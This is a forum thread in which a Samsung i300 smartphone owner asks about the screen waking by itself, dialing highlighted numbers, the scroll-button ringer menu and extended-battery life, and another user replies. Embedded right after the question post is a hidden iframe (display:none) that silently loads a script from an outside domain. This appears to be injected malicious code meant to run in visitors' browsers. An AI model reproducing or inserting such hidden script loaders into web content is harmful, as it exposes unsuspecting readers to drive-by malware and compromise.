Questions from a 6035 convert

Hi,

I just purchased a i300 after having a kyocera 6035 for over a year and I love it. I have followed this board for months before I took the plunge and it has been a great resource.

A couple of questions/gripes:

1. My screen powers itself on regularly, every few mintues. I don't think I have any software installed that checks for email or does anything where it would need to power-up like that. Any ides?

2. The 6035 had a nice feature in that you could highlight a phone number in a memo or some other program besides the address book and then tap the dialer button (where the calc button normally is on a palm) and it would dial the number you had highlighted. I miss this feature on my i300, does anybody know how I can get similar functionality?

3. I would love to turn off the ringer-type selection when pressing the scroll buttons when looking at the launcher screen. My hand is used to scrolling with those buttons on the left and I constantly try to page down when viewing my programs and I get the ringer selection options instead. Does anyone know of a hack or a setting that will just let those buttons scroll (I leave my phone on vibrate all the time and do not need quick access to choose a ringer).

4. Battery life is disappointing. I saw that Samsung sells an extended battery on their site. Does anyone know how long the extended battery is supposed to last over the standard battery?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

1) any button press will turn on the screen by default. you can change this in pref's to have only the power or phone side buttons turn on the display. Also, incoming calls turn on the display. I'm not positive, but entering/leaving roam may also. Other things (plugging/unplugging headset, etc.) also turn the display on.

2) No can do.

3) Dunno

4) Ext batt mui bueno. Depending on usage, I get 1+ day from it. Well worth buying.

Enjoy!
